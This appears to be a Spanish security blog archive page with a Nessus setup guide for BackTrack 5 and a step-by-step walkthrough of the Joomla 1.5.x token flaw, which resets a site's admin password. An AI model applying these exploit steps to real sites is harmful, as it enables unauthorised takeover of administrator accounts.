Archivo para 24 agosto 2011

Usar/configurar Nessus en Backtrack5

Nessus on Backtrack5

Por defecto Nessus ya viene instalado en BAcktrack 5, para poder hacer uso de este útil escáner de vulnerabilidades en BT5, se deben seguir los siguentes pasos:

  • Conseguir la clave o el código de activación, registrandose en el sitio WEb de Teneable/Nessus, en este enlace.

Luego de ingresar los datos y registrarse, una clave es enviada al correo.

  • Ingresar la clave/código de activación

Esto lo podemos realizar mediante el siguiente comando:

#/opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx, donde se reemplaza las X por el código que nos fue asignado

  • Crear un nuevo usuario, con su respectiva contraseña:

A traves del siguiente comando:

#/opt/nessus/sbin/nessus-adduser

  • Iniciar el servicio:

# /etc/init.d/nessusd start

Es too…

Saludos

Vulnerabilidad en Joomla 1.5 – Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Vulnerabilidad que permite el cambio de la contraseña de administrador, en pocos simples pasos:

1. Ir a la url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Escribir en el campo “token” el siguiente caracter: ‘ y dar click en SUBMIT

3. Escribir el nuevo password para admin

Bingo!!
4. Ir a la url del sitio : target.com/administrator/
5. Loguearse como admin con el nuevo password
Conclusión: la de siempre, parchar y mantener actualizado su Joomla, o en su defecto cambiar por otras alternativas XD
Saludos
Fuente: